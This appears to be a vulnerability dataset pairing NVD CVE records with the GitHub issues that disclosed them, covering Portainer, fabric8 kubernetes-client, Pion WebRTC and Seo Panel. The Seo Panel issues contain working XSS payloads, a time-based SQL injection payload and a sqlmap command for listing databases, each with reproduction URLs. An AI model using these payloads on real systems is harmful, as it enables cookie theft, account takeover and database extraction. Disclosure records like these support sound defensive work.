"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/portainer/portainer/issues/4105"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/portainer/portainer/issues/4105"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:portainer:portainer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CA8836F8-EA3E-4DCB-9B6B-FA6111980475",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"732"
] | 732 | https://github.com/portainer/portainer/issues/4105 | [
"Third Party Advisory"
] | github.com | [
"portainer",
"portainer"
] | We currently provide the ability for a user to specify additional container capabilities when deploying a container, both using the container UX and also via a compose file. There are certain capabilities that could be escalate privilege higher than a user should need for reasonable activities, and therefore may be deemed a security risk.
We need to provide a new security option that allows the administrator to disable the ability for non-admin users to manually set container capabilities.
This change should be reflected in the front end (remove the option to set capabilities), and also the backend (to block the use via stacks or API).
| Disable Container Capabilities for non-admins | https://api.github.com/repos/portainer/portainer/issues/4105/comments | 3 | 2020-07-27T03:51:32Z | 2021-01-19T21:05:25Z | https://github.com/portainer/portainer/issues/4105 | 665,954,628 | 4,105 | 1,758 |
CVE-2020-24264 | 2021-03-16T15:15:12.607 | Portainer 1.24.1 and earlier is affected by incorrect access control that may lead to remote arbitrary code execution. The restriction checks for bind mounts are applied only on the client-side and not the server-side, which can lead to spawning a container with bind mount. Once such a container is spawned, it can be leveraged to break out of the container leading to complete Docker host machine takeover. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/portainer/portainer/issues/4106"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/portainer/portainer/issues/4106"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:portainer:portainer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CA8836F8-EA3E-4DCB-9B6B-FA6111980475",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/portainer/portainer/issues/4106 | [
"Third Party Advisory"
] | github.com | [
"portainer",
"portainer"
] | Right now we allow the Portainer administrator to "disable the use of bind mounts by non-admins", which is purely a front-end restriction, and is more of a "hide the capability". This feature stops using from selecting to use bind mounts in the container / service creation views, and stops the use of bind mounts when writing stacks. However, if a skilled user was to craft an API request to Portainer that included bind mounts, it would succeed as there is no backend enforcement.
To ensure security, we should enforce this restriction via the backend so that it cannot be used through the Portainer API.
| enforce the security switch "disable the use of bind mounts" when set via API | https://api.github.com/repos/portainer/portainer/issues/4106/comments | 5 | 2020-07-27T03:57:20Z | 2021-03-17T19:42:13Z | https://github.com/portainer/portainer/issues/4106 | 665,956,241 | 4,106 | 1,759 |
CVE-2021-20218 | 2021-03-16T21:15:10.930 | A flaw was found in the fabric8 kubernetes-client in version 4.2.0 and after. This flaw allows a malicious pod/container to cause applications using the fabric8 kubernetes-client `copy` command to extract files outside the working path. The highest threat from this vulnerability is to integrity and system availability. This has been fixed in kubernetes-client-4.13.2 kubernetes-client-5.0.2 kubernetes-client-4.11.2 kubernetes-client-4.7.2 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fabric8io/kubernetes-client/issues/2715"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fabric8io/kubernetes-client/issues/2715"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:kubernetes-client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "396A03F1-9514-4805-9AB5-6B31FD4B4413",
"versionEndExcluding": "4.7.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:kubernetes-client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "15E80E40-DCBB-4043-B074-674D548FD0AA",
"versionEndExcluding": "4.11.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:kubernetes-client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A777CC85-DC45-4E4B-B11C-E0CF9F06593D",
"versionEndExcluding": "4.13.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.12.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:kubernetes-client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "70D40776-9CBC-4F2F-9702-525330082531",
"versionEndExcluding": "5.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:a-mq_online:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E6C99D72-43AD-4A22-AE66-44E868323D4C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:build_of_quarkus:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CE29B9D6-63DC-4779-ACE8-4E51E6A0AF37",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:codeready_studio:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BAF877F-B8D5-4313-AC5C-26BB82006B30",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:descision_manager:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D5863BBF-829E-44EF-ACE8-61D5037251F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:integration_camel_k:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B87C8AD3-8878-4546-86C2-BF411876648C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:jboss_fuse:7.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B40CCE4F-EA2C-453D-BB76-6388767E5C6D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/fabric8io/kubernetes-client/issues/2715 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"fabric8io",
"kubernetes-client"
] | A recently found [vulnerability](https://seclists.org/oss-sec/2021/q1/19) was fixed in [another project](https://github.com/kubernetes-client/java/issues/1491) similar to this one. It might potentially affect [a similar implementation](https://github.com/fabric8io/kubernetes-client/blob/c9bf95da45f2560a7be7651fc37db5257c5418b1/kubernetes-client/src/main/java/io/fabric8/kubernetes/client/dsl/internal/core/v1/PodOperationsImpl.java#L563) in `PodOperationsImpl`.
Ironically, [it prints out the normalized path](https://github.com/fabric8io/kubernetes-client/blob/c9bf95da45f2560a7be7651fc37db5257c5418b1/kubernetes-client/src/main/java/io/fabric8/kubernetes/client/dsl/internal/core/v1/PodOperationsImpl.java#L574) into stdout, but uses the original (potentially dangerous) path. | Potential CVE? | https://api.github.com/repos/fabric8io/kubernetes-client/issues/2715/comments | 2 | 2021-01-12T04:35:34Z | 2021-02-17T15:53:53Z | https://github.com/fabric8io/kubernetes-client/issues/2715 | 783,901,313 | 2,715 | 1,760 |
CVE-2021-28681 | 2021-03-18T04:15:14.617 | Pion WebRTC before 3.0.15 didn't properly tear down the DTLS Connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. )A WebRTC implementation shouldn't allow the user to continue if verification has failed.) | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pion/webrtc/issues/1708"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pion/webrtc/security/advisories/GHSA-74xm-qj29-cq8p"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pion/webrtc/issues/1708"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pion/webrtc/security/advisories/GHSA-74xm-qj29-cq8p"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webrtc_project:webrtc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6268E745-4C5D-4103-AD3F-0B16DBA1B1CD",
"versionEndExcluding": "3.0.15",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/pion/webrtc/issues/1708 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pion",
"webrtc"
] | <!--
Come join our community on Slack https://pion.ly/slack for quicker support and more resources
We also provide a Knowledge Base https://pion.ly/knowledge-base that covers Pion and general WebRTC
We maintain a FAQ of common issues and questions https://pion.ly/knowledge-base/pion-basics/faq/
Please answer these questions before submitting your issue. Thanks!
-->
### Your environment.
- Version: pion/webrtc v3.0.14
- Browser: N/A
- Other Information - reproducable with example/data-channels-create & example/data-channels
### What did you do?
<!--
If possible, provide an example for reproducing the error.
A complete runnable program is good.
-->
- Run both `data-channels-create` and `data-channels` from example.
- Once the SDP offer has been generated, decode it with base64.
- Randomly edit the DTLS fingerprint value in the SDP offer
- Copy & paste the base64-encoded SDP offer into the waiting `data-channels`
- Copy & paste the SDP answer generated by `data-channels` into `data-channels-create`
### What did you expect?
The built-in fingerprints verification should throw an error and therefore prevent the data-channel from being established.
### What happened?
The data channel was created as usual.
```
ICE Connection State has changed: checking
ICE Connection State has changed: connected
Data channel 'data'-'824635660400' open. Random messages will now be sent to any connected DataChannels every 5 seconds
Sending 'SBfBWYaFzaFZDiV'
Message from DataChannel 'data': 'EtaKTfGglNgpNNn'
```
| DTLS Fingerprints in SDP Offer/Answer are not verified | https://api.github.com/repos/pion/webrtc/issues/1708/comments | 9 | 2021-03-17T22:26:36Z | 2021-03-18T00:41:08Z | https://github.com/pion/webrtc/issues/1708 | 834,225,058 | 1,708 | 1,761 |
CVE-2021-28417 | 2021-03-18T12:15:12.037 | A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via archive.php and the "search_name" parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162914/Seo-Panel-4.8.0-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/208"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162914/Seo-Panel-4.8.0-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/208"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/seopanel/Seo-Panel/issues/208 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"seopanel",
"Seo-Panel"
] | Hi team,
I would like to report XSS vulnerability.
**Description**
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
___
**XSS Payload:** x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
___
**Vulnerable parameter:** search_name
___
**Steps to Reproduce the Issue:**
1- Login to SEO admin panel
2- Add below line at the end:
archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com
3- Hover your mouse near to "CTR" field
As you can see, XSS is triggered and can send cookies to attacker.
___
**Video POC:** https://drive.google.com/file/d/1qRnOyVoUhmaZnDcNMwi4U5RiLwoukq3b/view?usp=sharing
___
**Impact**
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss. | XSS Vulnerability in "search_name" parameter | https://api.github.com/repos/seopanel/Seo-Panel/issues/208/comments | 0 | 2021-03-11T19:12:27Z | 2021-03-22T07:52:32Z | https://github.com/seopanel/Seo-Panel/issues/208 | 829,446,239 | 208 | 1,762 |
CVE-2021-28418 | 2021-03-18T12:15:12.100 | A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via settings.php and the "category" parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162914/Seo-Panel-4.8.0-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/207"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162914/Seo-Panel-4.8.0-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/207"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/seopanel/Seo-Panel/issues/207 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"seopanel",
"Seo-Panel"
] | Hi team,
I would like to report XSS vulnerability.
**Description**
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
___
**XSS Payload**: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
___
**Vulnerable parameter**: category
___
**Steps to Reproduce the Issue:**
1- Login to SEO admin panel
2- Add below line at the end:
settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
3- Hover your mouse to "Cancel" field
As you can see, XSS is triggered and can send cookies to attacker.
___
**Video POC**: https://drive.google.com/file/d/1af8sZTkoKpaetj0Sh0T9ON4HhUDhN6_1/view?usp=sharing
___
**Impact**
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
| XSS Vulnerability in "category" parameter | https://api.github.com/repos/seopanel/Seo-Panel/issues/207/comments | 2 | 2021-03-11T19:08:43Z | 2021-03-24T09:02:13Z | https://github.com/seopanel/Seo-Panel/issues/207 | 829,443,724 | 207 | 1,763 |
CVE-2021-28419 | 2021-03-18T12:15:12.177 | The "order_col" parameter in archive.php of SEO Panel 4.8.0 is vulnerable to time-based blind SQL injection, which leads to the ability to retrieve all databases. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/209"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/209"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/seopanel/Seo-Panel/issues/209 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"seopanel",
"Seo-Panel"
] | Hi Team
I would like to report Time-based blind SQLI.
**Description:**
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
___
**Vulnerable parameter:** order_col
___
**Step to reproduce the issue:**
1- Login to SEO admin Panel
2- Copy paste below link:
/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=0
3- Replace value of "order_col" parameter with below payloads:
Payload: (SELECT 7397 FROM (SELECT(SLEEP(10)))keuG)
4- You can see the page sleeps for 10 seconds and maybe some seconds more.
___
**Video POC**: https://drive.google.com/file/d/1ZM8_UvJR5HUGJzzZWBoM7k7Qw0MZS4WN/view?usp=sharing
___
**Automated way:**
sqlmap -r file.txt --batch --level 5 --risk 3 --dbms MYSQL --dbs --technique=T --flush-session
___
**Impact**
Attacker can mount one or more of the following type of attacks successfully:
• Reading, updating and deleting arbitrary data/tables from the database
• Executing commands on the underlying operating system
| Time-based blind SQLi Injection Vulnerability in "order_col" parameter | https://api.github.com/repos/seopanel/Seo-Panel/issues/209/comments | 1 | 2021-03-13T12:05:18Z | 2021-03-23T10:32:02Z | https://github.com/seopanel/Seo-Panel/issues/209 | 830,884,757 | 209 | 1,764 |
CVE-2021-28420 | 2021-03-18T12:15:12.240 | A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via alerts.php and the "from_time" parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
